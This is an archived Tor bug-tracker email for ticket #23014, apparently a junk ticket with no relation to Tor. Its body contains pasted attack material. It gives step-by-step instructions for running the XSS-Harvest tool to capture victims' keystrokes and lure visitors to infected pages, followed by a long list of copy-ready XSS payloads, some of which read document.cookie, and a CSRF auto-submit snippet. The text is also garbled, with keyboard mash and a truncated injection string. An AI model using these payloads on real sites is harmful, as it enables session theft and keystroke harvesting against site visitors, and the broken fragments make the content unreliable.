[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

[tor-bugs] #23014 [- Select a component]: manish

Subject: [tor-bugs] #23014 [- Select a component]: manish
From: "Tor Bug Tracker & Wiki" <blackhole@xxxxxxxxxxxxxx>
Date: Sun, 23 Jul 2017 06:09:46 -0000
Auto-submitted: auto-generated
Delivered-to: archiver@xxxxxxxx
Delivery-date: Sun, 23 Jul 2017 02:09:57 -0400
List-archive: <http://lists.torproject.org/pipermail/tor-bugs/>
List-help: <mailto:tor-bugs-request@lists.torproject.org?subject=help>
List-id: "auto: Tor bug tracker status mails" <tor-bugs.lists.torproject.org>
List-post: <mailto:tor-bugs@lists.torproject.org>
List-subscribe: <https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs>, <mailto:tor-bugs-request@lists.torproject.org?subject=subscribe>
List-unsubscribe: <https://lists.torproject.org/cgi-bin/mailman/options/tor-bugs>, <mailto:tor-bugs-request@lists.torproject.org?subject=unsubscribe>
Reply-to: no-reply@xxxxxxxxxxxxxx, tor-assistants@xxxxxxxxxxxxxx
Sender: "tor-bugs" <tor-bugs-bounces@xxxxxxxxxxxxxxxxxxxx>

#23014: manish
--------------------------------------+--------------------------------
     Reporter:  manishhacks8          |      Owner:
         Type:  enhancement           |     Status:  new
     Priority:  Medium                |  Milestone:  Tor: 0.3.1.x-final
    Component:  - Select a component  |    Version:
     Severity:  Normal                |   Keywords:
Actual Points:                        |  Parent ID:
       Points:                        |   Reviewer:
      Sponsor:                        |
--------------------------------------+--------------------------------
 jhflkdsfnasfa d* Server console displays real-time data received (due to
 multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid
 confusion).
 * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation
 to stored XSS only in most cases), FF5, Chrome and various mobile browsers
 (Safari and Android). Please let me know your success with other browsers.
 * Overcomes browser oddities, such as Internet Explorer throttling
 requests to the same URL when exfiltrating keystrokes.

 How to Exploit XSS with XSS-Harvest?

 Identify a page vulnerable to XSS (reflected or persistent will be fine –
 unless the victim is running IE9 or another plugin such as NoScript).

 Understand the markup of the page. You should be looking to insert
 syntactically correct <script></script> tags in to the source of the
 vulnerable page. Most attackers will insert something like
 ‘<script>alert(1)</script>’ at this stage to ensure the page is actually
 vulnerable.

 Start the XSS-Harvest server as root if you wish to bind to a TCP port <
 1024 (default port is 80), or as a limited user on a port > 1024 using the
 -p option. To start the server you must instruct it to listen with the -l
 option.

 Insert the following ‘injection string’ into the vulnerable page:

 <script src=”>

 This will return the client-side JavaScript to the victim, indicated by
 the ‘i’ in the URL.
 Entice visitors to the infected page (or to follow a link in the case of
 reflected XSS).
 Watch your victims roll in – a new history file will be created for each
 new victim.
 To use of the redress function, start the server with the -r parameter:

 ./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

 Basic dependencies:
 HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std,
 Net::Server::PreFork

 Download XSS-Harvest

 –> New:- Advance Scripts To Find XSS Vulnerabilities In Websites.
 Just Copy any script and try..
 To Redirect exploit code:

 ';redirecturl='javascript:alert("XSS")
 ';redirecturl='http://google.com/'

 Now for XSS
 Example: www.xyz.com?q="XSS Script"

     "/>alert("Xss:Priyanshu")
     "/></script><script>alert(/XSS : Priyanshu/)</script>

 <body onload=alert(1)>
 "<body onload="alert('XSS by Priyanshu')">

 "><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

 <body onload=document.getElementById("xsrf").submit()>

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a

     http://test.com<script>alert(document.domain)</script>
     http://test.com<script>alert(document.cookie)</script>

 <img src=x onerror=alert(document.domain)>

 x"></script><img src=x onerror=alert(1)>

 q=" onclick="alert(/XSS/)

 "><iframe src='javascript:prompt(/XSS/);'>

 <iframe src="http://google.com";></iframe>

 "><iframe src=a onload=alert('XSS')<

 </script><script>alert(document.cookie)</script>

 <xss>alert('xss')</xss>

 <iframe src="http://google.com";></iframe>

 DOM Based XSS Scripts

     /default.aspx#"><img src=x onerror=prompt('XSS');>
     /default.aspx#"><img src=x onerror=prompt('0');>

 <img src=x onerror=prompt(1);> by ">

 “><img src=x onerror=prompt(0)>.txt.jpg

 “><img src=x onerror=alert(document.cookie)>

 "><img src=x onerror=prompt(1);>

 "><script>alert('XSS')</script>

 id=abc"><Script>alert(/xss/)</SCRIPT>

 "><img src=" " onMouseover=prompt(/xss/);>

 Default.aspx/" onmouseout="confirm(1)'x="

 For More Script Coding Of XSS Visit ha.ckers.org and Brute.

--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/23014>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
_______________________________________________
tor-bugs mailing list
tor-bugs@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs

Follow-Ups:
- Re: [tor-bugs] #23014 [- Select a component]: manish
  - From: Tor Bug Tracker & Wiki

Prev by Author: Re: [tor-bugs] #22606 [Webpages/Website]: update the meta data information for the website
Next by Author: Re: [tor-bugs] #21349 [Core Tor/Tor]: Split up very long functions in entrynodes.c
Previous by thread: Re: [tor-bugs] #23013 [Core Tor/Tor]: Tor 0.3.0.9 tarball was missing ReleaseNotes entry
Next by thread: Re: [tor-bugs] #23014 [- Select a component]: manish
Index(es):
- Author
- Thread